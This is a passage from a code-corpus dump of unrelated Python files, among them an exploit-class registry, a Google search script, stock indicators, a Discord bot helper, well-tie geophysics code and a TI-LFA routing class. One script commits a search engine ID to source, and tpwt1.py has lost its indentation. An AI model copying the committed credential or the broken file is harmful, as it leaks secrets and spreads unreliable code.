        self.loop = loop
        return loop

    def __exit__(self, *args):
        self.loop.close()
class ExploitEncoder(JSONEncoder):
    """JSON encoder that serializes Exploit subclasses as metadata dicts."""

    def default(self, exploit):
        """Encode an Exploit subclass; delegate everything else to the base encoder.

        Fixes: the original dropped the ``return`` on the delegation path, and
        called ``issubclass`` on values that may not be classes (TypeError with
        a confusing message for e.g. instances).
        """
        if not (isinstance(exploit, type) and issubclass(exploit, Exploit)):
            # Base implementation raises TypeError for unserializable objects.
            return super().default(exploit)
        return {
            "vulnerable_function": exploit.get_vulnerable_function_fqn(),
            "source": exploit.source,
            "category_name": exploit.category_name,
            "notes": exploit.notes,
        }
def get_exploits_by_category() -> Dict[str, Type[Exploit]]:
    """Group every discovered exploit class by its ``category_name``."""
    grouped = defaultdict(list)
    for exploit_cls in get_exploits():
        grouped[exploit_cls.category_name].append(exploit_cls)
    return grouped
def get_exploit(class_name: str) -> Type[Exploit]:
    """Look up an exploit class by name; raises StopIteration when absent
    (same contract as the original ``next(...)`` form)."""
    for exploit_cls in get_exploits():
        if exploit_cls.__name__ == class_name:
            return exploit_cls
    raise StopIteration
def get_exploits(starting_class: Type[Exploit] = Exploit, exclude_abstract=True) -> Set[Type[Exploit]]:
    """Collect every transitive subclass of *starting_class*.

    Iterative traversal over ``__subclasses__``; abstract classes are filtered
    out unless *exclude_abstract* is False.
    """
    subclasses = set()
    parents_to_process = [starting_class]
    while parents_to_process:
        parent = parents_to_process.pop()
        for child in parent.__subclasses__():
            if child not in subclasses:
                subclasses.add(child)
                parents_to_process.append(child)
    if exclude_abstract:
        subclasses = set(filter(lambda cls: not inspect.isabstract(cls), subclasses))
    return subclasses
| 2.4375 | 2 |
Search.py | ShowLove/GoogleSearchWebcrawler | 0 | 12766785 | import os
from google_search import GoogleCustomSearch
#set variables
# SECURITY: API credentials are hard-coded and committed to source control.
# Revoke these keys and load them from the environment / a secret store instead.
os.environ["SEARCH_ENGINE_ID"] = "000839040200690289140:u2lurwk5tko"
os.environ["GOOGLE_CLOUD_API_KEY"] = "<KEY>"
SEARCH_ENGINE_ID = os.environ['SEARCH_ENGINE_ID']
API_KEY = os.environ['GOOGLE_CLOUD_API_KEY']
api = GoogleCustomSearch(SEARCH_ENGINE_ID, API_KEY)
print("we got here\n")
#for result in api.search('prayer', 'https://cse.google.com/cse/publicurl?cx=000839040200690289140:u2lurwk5tko'):
for result in api.search('pdf', 'http://scraperwiki.com'):
    print(result['title'])
    print(result['link'])
    print(result['snippet'])
utils/compute_stock_features.py | nivilo/Chase | 68 | 12766786 | <reponame>nivilo/Chase<filename>utils/compute_stock_features.py
import pandas as pd
# Rolling window (in rows) for the simple moving average and Bollinger bands.
SMA_ROLLING_WINDOW = 5
# Smoothing factor for the exponential moving average.
EMA_ALPHA = 0.5


def sma(data: pd.DataFrame, feature):
    """Simple moving average of *feature* over SMA_ROLLING_WINDOW rows."""
    return data[feature].rolling(SMA_ROLLING_WINDOW).mean()


def daily_returns(data: pd.DataFrame, feature):
    """Period-over-period fractional return of *feature* (first row is NaN)."""
    return data[feature] / data[feature].shift() - 1


def min_bollinger_band(data: pd.DataFrame, feature):
    """Lower Bollinger band: rolling mean minus two *rolling* standard deviations.

    Fixed: the original subtracted two whole-series standard deviations,
    which is not the Bollinger band definition.
    """
    rolling = data[feature].rolling(SMA_ROLLING_WINDOW)
    return rolling.mean() - 2 * rolling.std()


def max_bollinger_band(data: pd.DataFrame, feature):
    """Upper Bollinger band: rolling mean plus two *rolling* standard deviations."""
    rolling = data[feature].rolling(SMA_ROLLING_WINDOW)
    return rolling.mean() + 2 * rolling.std()


def ema(data: pd.DataFrame, feature):
    """Exponentially weighted moving average of *feature* with alpha=EMA_ALPHA."""
    return data[feature].ewm(alpha=EMA_ALPHA).mean()
| 2.859375 | 3 |
advertise/forms/__init__.py | sadagatasgarov1/sahibinden | 2 | 12766787 | from advertise.forms.auth import CustomSignupForm
from advertise.forms.user import UpdateUserForm
| 1.085938 | 1 |
build/cls/tp/tpwt1.py | amunoz1/mines | 1 | 12766788 | # well ties
# @author <NAME>, Colorado School of Mines
# @version 01.21.2014
from dtw import *
from tputils import *
from wtutils import *
from imports import *
# Params:
fp = 35
q = 100
dz = getDz()
# Image warping
dr1 = 0.02 # 2D smoothness vertically
dr2 = 0.50 # 2D smoothness vertically
dr3 = 0.50 # 2D smoothness vertically
r1min,r1max = -0.10,0.10 # vertical constraint # use -0.06,0.12,0.02,0.5,-1.0,1.0
r2min,r2max = -0.50,0.50 # vertical constraint # use -0.06,0.12,0.02,0.5,-1.0,1.0
r3min,r3max = -0.50,0.50 # vertical constraint # use -0.06,0.12,0.02,0.5,-1.0,1.0
smin,smax = -0.100,0.100 # min and max time shifts for 2D/3D warping
propDir = getPropDir()
wset = getLogDataset("d")
phase = 44
def main(args):
global s1,s2,s3
cut1=[0.10,1.25];cut2=[3.40,6.65];cut3=[0.6,2.7];
g,s3,s2,s1,fo = getImage(normalize=True,cut1=cut1,cut2=cut2,cut3=cut3,rnrm=True)
#wells = [3,12,16,15,7,4,2,11]; nm="7" # good wells for 3D
well = 15
uwi = getIDFromDeepSet(well)
goSingleTie(g,uwi,well)
def goSingleTie(g,uwi,well):
wid = str(well)
wt = WellTie(uwi,dz,s1,wset)
wt.makePropagatorSeismogram(propDir,fp,q,phase)
x3 = wt.xf; x2 = wt.yf
gi,ix2,ix3 = getTraces(g,x2,x3)
#wt.findPhase()
wt.computeSingleWellTie(gi,r1min,r1max,smin,smax,dr1)
tz0 = wt.tz0
f = wt.f
sf = wt.sf
sz = wt.sz
tz1 = wt.tz1
h = wt.h
sh = wt.sh
v0 = wt.v
v1 = wt.v1
pv = wt.pv
u = wt.u
php = wt.getPhasePlot()
gi0 = gi[0]
plotCurve(gi0,s1,f,sf,title='untie')
plotCurve(gi0,s1,h,sh,title='tied')
plotCurve(tz0,sz,tz1,sz,title='td-curves')
#plotPhaseRMS(php,len(php),1,paper='phaseplotswt'+wid)
pack = [f,sf,h,sh,u,sz,tz0,tz1,v0,v1,pv,gi,ix2,ix3]
return pack
#########################
# For bug finding only: #
#########################
def goOldShifts(g):
uwi,set = getWellFromSet(well)
ai,x2,x3,z0,v,d,sz = getLogs(uwi,set)
sf,f,tz0 = getPropagatorSeismogram(sz,v,d,q,phase=phase,normalize=True)
gi,ix2,ix3 = getTraces(g,x2,x3)
u,h,sh = getWarpingShiftsOld(sf,s1,f,gi,r1min,r1max,dr1)
tz1,v1,pv = updateTDandVelocity(sz,u,tz0,sf)
gi0 = gi[0]
plotCurve(gi0,s1,f,sf,title='old tie')
plotCurve(gi0,s1,h,sh,title='old tie')
plotCurve(tz0,sz,tz1,sz,title='old tie')
return u,sf,tz1,sz
#------------------------------------------------------------------------------#
class RunMain(Runnable):
def run(self):
main(sys.argv)
SwingUtilities.invokeLater(RunMain())
| 1.875 | 2 |
tfn/tools/loaders/__init__.py | UPEIChemistry/TFN_Layers | 2 | 12766789 | <filename>tfn/tools/loaders/__init__.py
"""
Sub-package containg all loader classes
"""
from .data_loader import DataLoader
from .qm9_loader import QM9DataDataLoader
from .iso17_loader import ISO17DataLoader
from .ts_loader import TSLoader
from .sn2_loader import SN2Loader
from .isom_loader import IsomLoader
| 1.109375 | 1 |
functions.py | StoneMasons4106/sleeper-ffl-discordbot | 1 | 12766790 | # Import needed libraries
import discord
import os
import pymongo
import pendulum
import requests
import re
if os.path.exists("env.py"):
import env
# Define Environment Variables
MONGO_DBNAME = os.environ.get("MONGO_DBNAME")
MONGO_URI = os.environ.get("MONGO_URI")
MONGO_CONN = pymongo.MongoClient(MONGO_URI)
MONGO = pymongo.MongoClient(MONGO_URI)[MONGO_DBNAME]
# Get Existing Server League Object from Mongo
def get_existing_league(message):
    """Look up this Discord guild's league document; returns None when absent."""
    existing_league = MONGO.servers.find_one(
        {"server": str(message.guild.id)})
    # NOTE(review): closes the shared Mongo client after every call — confirm intended.
    MONGO_CONN.close()
    return existing_league
# Get Existing Player Object from Mongo
def get_existing_player(first_name, last_name, team_abbreviation):
    """Case-insensitive lookup of a player by full name and team abbreviation.

    NOTE(review): inputs are interpolated into the regex unescaped —
    consider re.escape() if names come from users.
    """
    existing_player = MONGO.players.find_one(
        {"name": re.compile(f'{first_name} {last_name}', re.IGNORECASE), "team": re.compile(team_abbreviation, re.IGNORECASE)})
    MONGO_CONN.close()
    return existing_player
# Get All Server Objects from Mongo
def get_all_servers():
    """Return a cursor over every server document."""
    servers = MONGO.servers.find(
        {})
    MONGO_CONN.close()
    return servers
# Set Embed for Discord Bot Responses
def my_embed(title, description, color, name, value, inline, bot):
    """Build a Discord embed with a single field and the bot's avatar as author icon."""
    embed = discord.Embed(title=title, description=description, color=color)
    embed.add_field(name=name, value=value, inline=inline)
    embed.set_author(name='Sleeper-FFL', icon_url=bot.user.display_avatar)
    return embed
# Get Current Week
def get_current_week():
    """Return (week, future): current NFL week number and whether the season
    has not started yet (then week is forced to 1)."""
    today = pendulum.today(tz='America/New_York')
    # Sleeper's public NFL state endpoint supplies the season start date.
    nfl_state = requests.get(
        'https://api.sleeper.app/v1/state/nfl'
    )
    nfl_date_list = nfl_state.json()["season_start_date"].split("-")
    starting_week = pendulum.datetime(int(nfl_date_list[0]), int(nfl_date_list[1]), int(nfl_date_list[2]), tz='America/New_York')
    if starting_week.is_future():
        future = True
        week = 1
    else:
        future = False
        # Full weeks elapsed since kickoff, plus one.
        week = today.diff(starting_week).in_weeks() + 1
    return week, future
# Check if a Server Has Patron Status
def is_patron(existing_league):
    """Return True exactly when the server document carries patron == "1"."""
    return existing_league.get("patron") == "1"
| 2.46875 | 2 |
data_process/setup.py | Fifi-Huo/Digital_Appendix_C | 0 | 12766791 | import os, shutil
from setuptools import setup, find_packages
#
CUR_PATH = os.path.dirname(os.path.abspath(__file__))
path = os.path.join(CUR_PATH, 'build')
if os.path.isdir(path):
print('INFO del dir ', path)
shutil.rmtree(path)
setup(
name = 'pipeline',
# Author details
author='JiejunHuo',
author_email='<EMAIL>',
version = '0.1',
description='Creating MODIS and 2B-CLDCLASS-lidar co-located files (following the earlier work by Zantedeschi et al. (2019))',
packages = find_packages('src','netcdf'),
package_data = {
# include the *.nc in the netcdf folder
'netcdf': ['*.nc'],
},
include_package_data = True,
#exclude_package_data = {'docs':['1.txt']},
license='MIT',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: System :: Logging',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
py_modules=["pipeline"],
install_requires = [
'netCDF4==1.5.1.2',
'scikit-learn==0.20.0',
'scipy==1.1.0',
],
) | 1.75 | 2 |
handlers/postpage.py | caasted/multi-user-blog | 0 | 12766792 | <reponame>caasted/multi-user-blog
import webapp2
import os
import jinja2
import hmac
import hashlib
import random
import string
import time
from google.appengine.ext import db
from models import *
from . import handler
class PostPageHandler(handler.Handler):
    """Renders a single blog post and handles new comment submissions (Py2/GAE)."""
    def render_post(self, post, content="", error=""):
        """Render the post page with its comments; *post* is the Posts entity id."""
        username = self.check_cookie()
        entry = posts.Posts.get_by_id(long(post), parent=None)
        query = 'select * from Comments where post_id = :post_id'
        comments = db.GqlQuery(query, post_id = long(post))
        self.render("post.html", posts=entry, comments=comments,
                    content=content, error=error, username=username)
    def get(self, post):
        self.render_post(post)
    def post(self, post):
        """Create a comment for the logged-in user, then refresh the post's comment count."""
        content = self.request.get("content")
        # NOTE(review): error_msg is assigned but never used.
        error_msg = ""
        username = self.check_cookie()
        if username and content:
            comment = comments.Comments(post_id=long(post), content=content,
                                        author=username)
            comment.put()
            time.sleep(1)  # delay so count includes new post
            query = 'select * from Comments where post_id = :post_id'
            comment_count = db.GqlQuery(query, post_id = long(post)).count()
            entry = posts.Posts.get_by_id(long(post), parent=None)
            entry.comments = comment_count
            entry.put()
            time.sleep(1)  # delay so page doesn't load before db updates
            self.render_post(post=post)
        elif username:
            error = "You cannot post blank comments."
            self.render_post(post=post, error=error)
        else:
            self.redirect("/login")
| 2.46875 | 2 |
reports/report_iota_snapshot.py | andrasfe/iota-research | 0 | 12766793 | import matplotlib.pyplot as plt
import pandas as pd
from scipy.interpolate import make_interp_spline, BSpline
import numpy as np
def plot_results(title, csv_name):
    """Plot mean runtime vs. transaction count from ../<csv_name>.csv and save <csv_name>.jpg."""
    df = pd.read_csv('../' + csv_name + '.csv')
    ax = plt.gca()
    df.columns = ['V', 'E', 'Time']
    df = df[['V', 'Time']]
    # Average repeated measurements per vertex (transaction) count.
    df = pd.DataFrame(df.groupby('V').mean()).reset_index()
    print(df.head(5))
    df.plot(kind='line',x='V',y='Time', color='blue', ax=ax)
    ax.set_xlabel("No. of Transactions")
    ax.set_ylabel("Time (ms)")
    # ax.set_title("IRI Testing Results")
    ax.set_title(title + " implementation Test Results")
    df = df.sort_values(by=['V'])
    # Overlay a smoothed trend: cubic B-spline sampled at 7 evenly spaced points.
    tNew = np.linspace(df['V'].min(), df['V'].max(), 7)
    spl = make_interp_spline(df['V'].to_numpy(), df['Time'].to_numpy(), k=3)  # type: BSpline
    edgesSmooth = spl(tNew)
    plt.plot(tNew, edgesSmooth, "r-")
    plt.savefig(csv_name + '.jpg', dpi=150, bbox_inches='tight')
    # plt.show()
if __name__ == "__main__":
# plot_results('IRI', 'benchmarks.real.iri')
plot_results('Proposed', 'benchmarks.real.ours')
| 3 | 3 |
hackathon/scrapers/adia.py | Addepar/vizceral-example | 0 | 12766794 | <gh_stars>0
from hackathon.scrapers.base import BaseScraper
class AdiaScraper(BaseScraper):
    """Scraper producing log-search queries (Sumo Logic-style) for one host pattern."""
    def __init__(self, host_regex):
        BaseScraper.__init__(self)
        # Host-matching expression prepended to every query.
        self.__regex = host_regex
    def get_good_query_in(self):
        # "Good" signal: count of fetched GFFs per host.
        return self.__regex + ' AND log_class=*NotificationDataService | parse "fetched [*] GFFs" as gffs | "batu1.prod.addepar.com" as ip | count by ip, _sourceHost'
    def get_bad_query_in(self):
        # "Bad" signal: summed error counts per host.
        return self.__regex + ' AND "Finished processing status" | "batu1.prod.addepar.com" as ip | parse "error=*," as err | sum (err) as _count group ip, _sourceHost'
| 2.53125 | 3 |
oneRing/urls/timeslot.py | TylerRudie/narvi | 1 | 12766795 | <filename>oneRing/urls/timeslot.py
from django.conf.urls import url, include
from oneRing.restInterface.timeSlot.validate_v1 import timeSlot_validate_interface
# v1 API: validate a time slot by its one-time code.
urlpatterns = [
    url(r'^v1/validate/(?P<oneTimeCode>[0-9a-zA-Z_-]+)$',
        timeSlot_validate_interface.as_view(),
        name= 'timeSlot_validate'
    )
]
fastapi_mvc/commands/__init__.py | rszamszur/fastapi-mvc | 98 | 12766796 | """Command design pattern.
The ``fastapi-mvc.commands`` submodule implements command design pattern.
Resources:
1. https://refactoring.guru/design-patterns/command
"""
from fastapi_mvc.commands.base import Command
from fastapi_mvc.commands.invoker import Invoker
from fastapi_mvc.commands.run_generator import RunGenerator
from fastapi_mvc.commands.run_shell import RunShell
| 1.492188 | 1 |
test.py | simonmeister/pytorch-mono-depth | 56 | 12766797 | import argparse
import os
import shutil
import json
import numpy as np
import torch
import torch.nn as nn
import matplotlib.pyplot as plt
from dense_estimation.resnet import resnet50
from dense_estimation.output import GaussianScaleMixtureOutput, PowerExponentialOutput
from dense_estimation.losses import (BerHuLoss, RMSLoss, RelLoss, TestingLosses, HuberLoss,
Log10Loss, DistributionLogLoss)
#from dense_estimation.distributions import GaussianScaleMixture, PowerExponential
from dense_estimation.datasets.nyu_depth_v2 import NYU_Depth_V2
from dense_estimation.data import get_testing_loader
from dense_estimation.app.experiment import get_experiment
from dense_estimation.app.gui import display
from dense_estimation.logger import DistributionVisualizer, BasicVisualizer, visuals_to_numpy
parser = argparse.ArgumentParser(description='testing script')
parser.add_argument('--no_cuda', action='store_true', help='use cpu')
parser.add_argument('--threads', type=int, default=16, help='number of threads for data loader')
parser.add_argument('--seed', type=int, default=123, help='random seed to use')
parser.add_argument('--ex', type=str, default='default',
help='comma separated names of experiments to compare; use name:epoch to specify epoch to load')
parser.add_argument('--gpu', type=str, default='0', help='cuda device to use if using --cuda')
parser.add_argument('--max', type=int, default=20, help='max number of examples to visualize')
parser.add_argument('--samples', type=int, default=1, help='number of monte carlo dropout samples (sampling enabled if > 1)')
opt = parser.parse_args()
cuda = not opt.no_cuda
if cuda:
os.environ['CUDA_VISIBLE_DEVICES'] = opt.gpu
if not torch.cuda.is_available():
raise Exception("No GPU found, please run without --cuda")
out_size = (208, 256)
transf_size = (out_size[1], out_size[0])
raw_root = '/home/smeister/datasets'
testing_loader = get_testing_loader(NYU_Depth_V2, raw_root, 1, transf_size,
opt.threads, debug=False)
class BasicDist():
    """Minimal distribution-like wrapper exposing mean and variance
    (used for Monte-Carlo dropout sample statistics)."""
    def __init__(self, mean, var):
        self.mean = mean
        self.variance = var
def _test(ex, epoch):
    """Evaluate a saved experiment checkpoint on the testing set.

    Loads the experiment options from ``./log/<ex>/opts.txt``, rebuilds the
    matching model (with a distribution output head, or with MC-dropout
    sampling when ``opt.samples > 1``), restores the checkpoint weights, and
    accumulates the testing losses over ``testing_loader``.

    NOTE(review): relies on module-level names defined outside this view
    (``json``, ``opt``, ``cuda``, ``testing_loader``, ``nn``, ``torch``,
    ``np``, the model/loss/visualizer classes, ``get_experiment``,
    ``visuals_to_numpy``) -- presumably imported at the top of the file;
    confirm there.

    :param ex: experiment name (directory under ``./log``)
    :param epoch: checkpoint epoch to restore, or None for the default
    :return: (list of per-batch visualization image arrays, visualizer names)
    """
    results = []
    # Experiment options were serialized as JSON at training time.
    with open('./log/{}/opts.txt'.format(ex), 'r') as f:
        ex_opt = json.load(f)
    if ex_opt['dist'] != '':
        # Distribution head: the model predicts the parameters of a density.
        dist_map = {
            'gsm': (GaussianScaleMixture, lambda: GaussianScaleMixtureOutput(ex_opt['num_gaussians'])),
            'exp': (PowerExponential, lambda: PowerExponentialOutput()),
        }
        distribution, output_unit = dist_map[ex_opt['dist'] ]
        model = resnet50(output=output_unit(), fpn=ex_opt['fpn'], dropout_active=False)
        visualizer = DistributionVisualizer(distribution)
        dropout_active = False
    else:
        output_unit = None
        # MC-dropout: keep dropout active at test time so repeated forward
        # passes differ, enabling a sample mean/variance estimate.
        dropout_active = opt.samples > 1
        model = resnet50(fpn=ex_opt['fpn'], dropout_active=dropout_active)
        if dropout_active:
            # BasicDist wraps the sample mean/variance like a distribution.
            distribution = BasicDist
            visualizer = DistributionVisualizer(BasicDist)
        else:
            distribution = None
            visualizer = BasicVisualizer()
    losses_clses = [RMSLoss(), RelLoss(), Log10Loss()]
    #if distribution is not None:
    #    losses_clses += [DistributionLogLoss(distribution)]
    testing_multi_criterion = TestingLosses(losses_clses)
    if cuda:
        model = model.cuda()
        testing_multi_criterion = testing_multi_criterion.cuda()
    # get_experiment returns a 4-tuple; only the checkpoint path is needed.
    _, _, restore_path, _ = get_experiment(ex, False, epoch=epoch)
    state_dict = torch.load(restore_path)
    model.load_state_dict(state_dict)
    loss_names = [m.__class__.__name__
                  for m in testing_multi_criterion.scalar_losses]
    losses = np.zeros(len(loss_names))
    model.eval()
    prob = 0
    # opt.max == -1 means "evaluate the whole testing set".
    num = opt.max if opt.max != -1 else len(testing_loader)
    averages = []
    for i, batch in enumerate(testing_loader):
        print(i)
        # NOTE(review): `i > num` evaluates num+1 batches before breaking
        # (not num) -- confirm this off-by-one is intended.
        if i > num: break
        # volatile=True: legacy (pre-0.4) PyTorch inference mode, no autograd.
        input = torch.autograd.Variable(batch[0], volatile=True)
        target = torch.autograd.Variable(batch[1], volatile=True)
        if cuda:
            input = input.cuda()
            target = target.cuda()
        # Predictions are computed at half resolution
        upsample = nn.UpsamplingBilinear2d(size=target.size()[2:])
        samples = []
        if dropout_active:
            # Draw opt.samples stochastic predictions and summarize them.
            for _ in range(opt.samples):
                sample = model(input)
                samples.append(sample)
            stacked = torch.cat(samples, dim=1)
            mean = torch.mean(stacked, dim=1)
            var = torch.var(stacked, dim=1)
            output = [mean, var]
        else:
            output = model(input)
        if isinstance(output, list):
            # Multi-tensor output = distribution parameters; upsample each,
            # then reduce to the distribution mean for the scalar losses.
            output = [upsample(x) for x in output]
            cpu_outputs = [x.cpu().data for x in output]
            d = distribution(*output)
            output = d.mean
            if output_unit:
                # Average likelihood of the target under the predicted density.
                prob += torch.mean(d.prob(target[:, 0:1, :, :])).cpu().data[0]
                averages.append(d.averages)
        else:
            output = upsample(output)
            cpu_outputs = [output.cpu().data]
        losses += testing_multi_criterion(output, target).cpu().data.numpy()
        viz_pt = visualizer(input.cpu().data, cpu_outputs, target.cpu().data)
        images = visuals_to_numpy(viz_pt)
        results.append(images)
    # NOTE(review): normalized by the full loader length even when opt.max
    # limited the number of evaluated batches -- confirm intended.
    losses /= len(testing_loader)
    loss_strings = ["{}: {:.4f}".format(n, l)
                    for n, l in zip(loss_names, losses)]
    print("===> [{}] Testing {}"
          .format(ex, ', '.join(loss_strings)))
    if output_unit:
        averages = torch.squeeze(torch.mean(torch.stack(averages, dim=1), dim=1))
        prob /= len(testing_loader)
        print("===> [{}] Avg. Likelihood {}".format(ex, prob))
        print("===> [{}] Dist. Averages {}"
              .format(ex, averages.cpu().data.numpy()))
        distribution.plot(averages, label=ex)
    return results, visualizer.names
if __name__ == '__main__':
    # Each spec is "<experiment>" or "<experiment>:<epoch>".
    all_results = []
    plt.figure()
    for spec in opt.ex.split(','):
        parts = spec.split(':')
        checkpoint_epoch = int(parts[1]) if len(parts) == 2 else None
        batch_images, image_names = _test(parts[0], checkpoint_epoch)
        all_results.append(batch_images)
    plt.legend()
    plt.show()
    # image_names comes from the last evaluated experiment's visualizer.
    display(all_results, image_names)
models/beta/vss.py | YorkSu/hat | 1 | 12766798 | """
VGG-Swish-SE
For Cifar10
Default total parameter counts for this model (reference benchmark: cifar10):
Total params: 16,402,790
Trainable params: 16,390,246
Non-trainable params: 12,544
"""
from hat.models.advance import AdvNet
class vss(AdvNet):
  """VGG-style network with Swish activations and an SE block (VSS)."""

  def args(self):
    """Declare hyperparameters read by the AdvNet framework."""
    # Conv weight initialization / regularization.
    self.CONV_KI = 'he_normal'
    self.CONV_KR = None  # l2(0.0005)
    # Per-stage repeat counts and channel widths.
    self.TIME = [2, 2, 3, 3, 3]
    self.CONV = [64, 128, 256, 512, 512]
    self.BATCH_SIZE = 128
    self.EPOCHS = 384
    self.OPT = 'Adam'

  def build_model(self):
    """Assemble the conv stages, SE block, and classifier head."""
    # Pair each stage's repeat count with its channel width.
    self.CONV_ = list(zip(self.TIME, self.CONV))
    inputs = self.input(self.INPUT_SHAPE)
    x = inputs
    for stage_idx, stage in enumerate(self.CONV_):
      # Downsample between stages (not before the first one).
      if stage_idx:
        x = self.poolx(x)
      x = self.repeat(self.conv_s, *stage)(x)
    x = self.SE(x)
    x = self.GAPool(x)
    # Two dense blocks with dropout before the softmax classifier.
    for _ in range(2):
      x = self.local_s(x, 1024)
      x = self.dropout(x, 0.3)
    x = self.local(x, self.NUM_CLASSES, activation='softmax')
    return self.Model(inputs=inputs, outputs=x, name='vss')

  def conv_s(self, x_in, filters, kernel_size=3):
    """Conv -> BatchNorm -> Swish."""
    out = self.conv(
        x_in,
        filters,
        kernel_size,
        kernel_initializer=self.CONV_KI,
        kernel_regularizer=self.CONV_KR,
    )
    out = self.bn(out)
    return self.swish(out)

  def local_s(self, x_in, units):
    """Dense -> BatchNorm -> Swish."""
    out = self.local(
        x_in,
        units,
        activation=None,
        kernel_initializer=self.CONV_KI,
    )
    return self.swish(self.bn(out))

  def poolx(self, x_in, pool_size=3, strides=2):
    """Element-wise sum of max- and average-pooling over the same window."""
    pooled = [
        self.maxpool(x_in, pool_size=pool_size, strides=strides),
        self.avgpool(x_in, pool_size=pool_size, strides=strides),
    ]
    return self.add(pooled)
# test part
if __name__ == "__main__":
  # Smoke test: build the model on a larger input and print its summary.
  data_info = {'INPUT_SHAPE': (256, 256, 3), 'NUM_CLASSES': 120}
  vss(DATAINFO=data_info, built=True).summary()
| 2.265625 | 2 |
little_scripts_testing/test_mse_pfbinv.py | dcxSt/pfb-mod | 1 | 12766799 | import sys, os
sys.path.append("..")
import helper as h
from constants import SINC
import numpy as np
import matplotlib.pyplot as plt
# Build the per-frequency eigenvalue grids of the PFB window for three
# windows: plain sinc, sinc*hanning, and sinc*hamming.
# NOTE(review): `h` and SINC are project-local (helper.py / constants.py),
# so the exact matrix layout is assumed from their names -- confirm there.
eigengrid = h.r_window_to_matrix_eig(SINC) # h.window_pad_to_box_rfft(SINC,pad_factor=10.0)
eigengrid_hann = h.r_window_to_matrix_eig(SINC * np.hanning(len(SINC)))
eigengrid_hamm = h.r_window_to_matrix_eig(SINC * np.hamming(len(SINC)))
# Quick visual sanity check of the eigenvalue magnitudes.
plt.imshow(abs(eigengrid),aspect="auto")
plt.show(block=True)
# R[n] = mean of 1/|eig|^2 along axis 1: the factor by which quantization
# noise is amplified by the inverse PFB at index n.
plt.subplots(figsize=(10,5))
plt.subplot(121)
plt.semilogy(np.mean(1/abs(eigengrid**2),axis=1),".",label="SINC")
plt.semilogy(np.mean(1/abs(eigengrid_hann**2),axis=1),".",alpha=0.4,label="sinc hanning")
plt.semilogy(np.mean(1/abs(eigengrid_hamm**2),axis=1),".",alpha=0.4,label="sinc hamming")
plt.title("All terms Log Scale")
plt.ylabel("Log R[n]")
plt.xlabel("n")
plt.grid(which="both")
plt.legend()
# Right panel: linear-scale zoom on the first 1000 terms.
plt.subplot(122)
plt.plot(np.mean(1/abs(eigengrid[:1000]**2),axis=1),".",label="sinc")
plt.plot(np.mean(1/abs(eigengrid_hann[:1000]**2),axis=1),".",alpha=0.4,label="sinc hanning")
plt.plot(np.mean(1/abs(eigengrid_hamm[:1000]**2),axis=1),".",alpha=0.4,label="sinc hamming")
plt.title("First few terms")
plt.ylabel("R[n]")
plt.xlabel("n")
plt.legend()
plt.suptitle("Quantization Error Increase from Inverse PFB",fontsize=18)
plt.tight_layout()
plt.show(block=True)
| 2.25 | 2 |
tilfa.py | jwbensley/pyFRR | 2 | 12766800 |
import networkx as nx
import os
from diagram import Diagram
from spf import spf
class tilfa:
"""This class provides draft-ietf-rtgwg-segment-routing-ti-lfa TI-LFA calculations"""
def __init__(self, debug=0, ep_space=True, trombone=False):
"""
Init the TI-LFA class.
:param int debug: debug level, 0 is disabled.
:param bool ep_space: Consider nodes in EP space not just P-space
####:param bool trombone: Allow pq_node>dst path to trombone through p_node
:return None: __init__ shouldn't return anything
:rtype: None
"""
self.debug = 0
self.diagram = Diagram(debug=2)
self.ep_space = ep_space
self.path_types = ["tilfas_link", "tilfas_node"]
self.spf = spf(debug=self.debug)
###self.trombone = trombone
def check_sids(self, graph):
"""
Check that each node has a node SID and that each adjacency has an
adjacency SID, and they they are valid and unique.
:param networkx.Graph graph: NetworkX graph object
:return bool True: True if all SIDs are present and unique, else false
:rtype: bool
"""
node_sids = []
for node in graph.nodes():
if "node_sid" not in graph.nodes[node]:
raise Exception(
f"Node {node} is missing a node SID, can't run TI-LFA"
)
if type(graph.nodes[node]["node_sid"]) != int:
raise Exception(
f"Node {node} node SID is not an int, can't run TI-LFA"
)
node_sids.append(graph.nodes[node]["node_sid"])
if len(set(node_sids)) < len(node_sids):
raise Exception(
"Nodes found with non-unique node SIDs: "
f"{[sid for sid in node_sids if node_sids.count(sid) > 1]}"
)
adj_sids = []
for edge in graph.edges():
if "adj_sid" not in graph.edges[edge]:
raise Exception(
f"Link {edge} is missing an adjacency SID, can't run TI-LFA"
)
if type(graph.edges[edge]["adj_sid"]) != int:
raise Exception(
f"Link {edge} adjacency SID is not an int, can't run TI-LFA"
)
adj_sids.append(graph.edges[edge]["adj_sid"])
if len(set(adj_sids)) < len(adj_sids):
raise Exception(
"Links found with non-unique adjacency SIDs: "
f"{[sid for sid in adj_sids if adj_sids.count(sid) > 1]}"
)
def draw(self, graph, outdir, topology):
"""
Loop over the generated topologies and render them as diagram files.
:param networkx.Graph graph: NetworkX graph object
:param str outdir: String of the root output directory path
:param dict topology: Topology paths dict
:return bool True: True if all diagrams rendered otherwise False
:rtype: bool
"""
self.diagram.gen_sub_dirs(graph, outdir, self.path_types, topology)
for src, dst in [
(s, d) for d in graph.nodes for s in graph.nodes if s != d
]:
for path_type in self.path_types:
if path_type not in topology[src][dst]:
continue
if len(topology[src][dst][path_type]) < 1:
continue
tilfa_graph = graph.copy()
# Highlight the failed first-hop link as red
for path in topology[src][dst]["spf_metric"]:
tilfa_graph = self.diagram.highlight_fh_link(
"red",
tilfa_graph,
path,
)
# Highlight the failed first-hop node(s) as red
if path_type == "tilfas_node":
for path in topology[src][dst]["spf_metric"]:
tilfa_graph = self.diagram.highlight_fh_node(
"red",
tilfa_graph,
path,
)
for tilfa in topology[src][dst][path_type]:
# Highlight the path(s) from src to the PQ node(s)
for s_p_path in tilfa[0]:
print(f"s_p_path: {s_p_path}")
tilfa_graph = self.diagram.highlight_links(
"purple", tilfa_graph, s_p_path
)
tilfa_graph = self.diagram.highlight_nodes(
"purple", tilfa_graph, s_p_path
)
# Highlight the path(s) from the PQ node(s) to dst
for q_d_path in tilfa[1]:
print(f"q_d_path: {q_d_path}")
tilfa_graph = self.diagram.highlight_links(
"green", tilfa_graph, q_d_path
)
tilfa_graph = self.diagram.highlight_nodes(
"green", tilfa_graph, q_d_path
)
tilfa_graph = self.diagram.highlight_src_dst(
"lightblue", dst, tilfa_graph, src
)
# Add labels to links showing their cost
tilfa_graph = self.diagram.label_link_weights(tilfa_graph)
tilfa_graph = self.diagram.label_link_add_adjsid(tilfa_graph)
tilfa_graph = self.diagram.label_node_id(tilfa_graph)
